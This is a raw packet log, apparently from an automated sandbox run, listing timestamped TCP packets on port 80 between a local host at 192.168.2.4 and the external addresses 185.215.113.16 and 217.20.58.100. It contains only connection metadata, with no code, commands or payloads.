Dec 8, 2024 19:52:37.752418995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.752470016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.752607107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.752655983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.761112928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.761171103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.761208057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.761255026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.769372940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.769418955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.769556046 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.769599915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.777410030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.777421951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.777465105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.785762072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.785799026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.785831928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.785857916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.794116020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.794171095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.794214964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.794260025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.801780939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.801851034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.801887035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.801933050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.809350967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.809403896 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.865617990 CET	80	49724	217.20.58.100	192.168.2.4
Dec 8, 2024 19:52:37.865781069 CET	49724	80	192.168.2.4	217.20.58.100
Dec 8, 2024 19:52:37.865873098 CET	49724	80	192.168.2.4	217.20.58.100
Dec 8, 2024 19:52:37.897023916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.897118092 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.897135019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.897178888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.900856018 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.900918961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.927414894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.927490950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.927587986 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.927637100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.929708958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.929759026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.930622101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.930666924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.930773973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.930820942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.935184956 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.935235977 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.935272932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.935323000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.940031052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.940082073 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.940125942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.940166950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.944730043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.944777012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.944827080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.944873095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.949412107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.949462891 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.949529886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.949579000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.954175949 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.954225063 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.954283953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.954327106 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.959068060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.959119081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.959191084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.959243059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.963685036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.963737011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.963814020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.963859081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.968429089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.968482018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.968542099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.968588114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.973181963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.973236084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.973274946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.973329067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.977976084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.978049040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.978054047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.978094101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.982697964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.982759953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.982796907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.982842922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.985544920 CET	80	49724	217.20.58.100	192.168.2.4
Dec 8, 2024 19:52:37.987407923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.987467051 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.987499952 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.987557888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.992146015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.992206097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.992288113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.992357016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.996901035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.996954918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.997081995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.997129917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.001727104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.001775026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.001790047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.001817942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.006496906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.006555080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.006618977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.006688118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.011167049 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.011238098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.011300087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.011353970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.015970945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.016031027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.016041040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.016081095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.020816088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.020875931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.142930984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.142978907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.143136024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.144543886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.144598961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.144630909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.144675970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.147936106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.147988081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.159992933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.160046101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.160151958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.160198927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.161626101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.161674976 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.161741972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.161791086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.164922953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.164969921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.166101933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.166147947 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.166224003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.166270018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.169445992 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.169491053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.169583082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.169625998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.172709942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.172755957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.172846079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.172909021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.176024914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.176070929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.176109076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.176158905 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.179445028 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.179502010 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.179611921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.179652929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.182580948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.182621002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.182657957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.182707071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.185992002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.186038017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.186067104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.186115026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.189188004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.189241886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.189433098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.189479113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.192739964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.192797899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.192897081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.192940950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.195708990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.195755005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.195796013 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.195888996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.198981047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.199029922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.199065924 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.199110031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.202466011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.202512980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.202543974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.202586889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.205688953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.205734968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.205766916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.205810070 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.208878040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.208945036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.208956003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.208998919 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.212275982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.212320089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.212328911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.212368011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.215466976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.215480089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.215514898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.218758106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.218820095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.218828917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.218878031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.222697973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.222744942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.222765923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.222810030 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.225461960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.225509882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.225512028 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.225553036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.228590012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.228645086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.228729963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.228776932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.231939077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.231980085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.232000113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.232031107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.235236883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.235285997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.235323906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.235368013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.238790989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.238842964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.239054918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.239140034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.241851091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.241905928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.241982937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.242027044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.245064020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.245117903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.245127916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.245172977 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.248344898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.248392105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.248413086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.248455048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.251856089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.251929998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.251936913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.251966953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.254972935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.255023956 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.255116940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.255167961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.258210897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.258261919 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.335150957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.335289001 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.335321903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.335377932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.336873055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.336932898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.336961985 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.336997986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.340178013 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.340245962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.340310097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.340370893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.343434095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.343487978 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.343528986 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.343626022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.346538067 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.346592903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.346646070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.346702099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.353256941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.353318930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.353393078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.353447914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.354574919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.354626894 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.354636908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.354676008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.356992960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.357049942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.357053041 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.357090950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.359625101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.359673023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.359692097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.359709978 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.362631083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.362689972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.362716913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.362763882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.365243912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.365303993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.365309954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.365346909 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.368024111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.368040085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.368081093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.368098974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.370697975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.370755911 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.370814085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.370863914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.373568058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.373625040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.373639107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.373681068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.376086950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.376152992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.376265049 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.376326084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.378794909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.378851891 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.379204035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.379261017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.381453991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.381499052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.381525040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.381547928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.384243965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.384304047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.384321928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.384366989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.386878967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.386938095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.387012959 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.387057066 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.389528036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.389589071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.389648914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.389704943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.392302036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.392338037 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.392349005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.392376900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.394799948 CET	80	49757	185.215.113.16	192.168.2.4
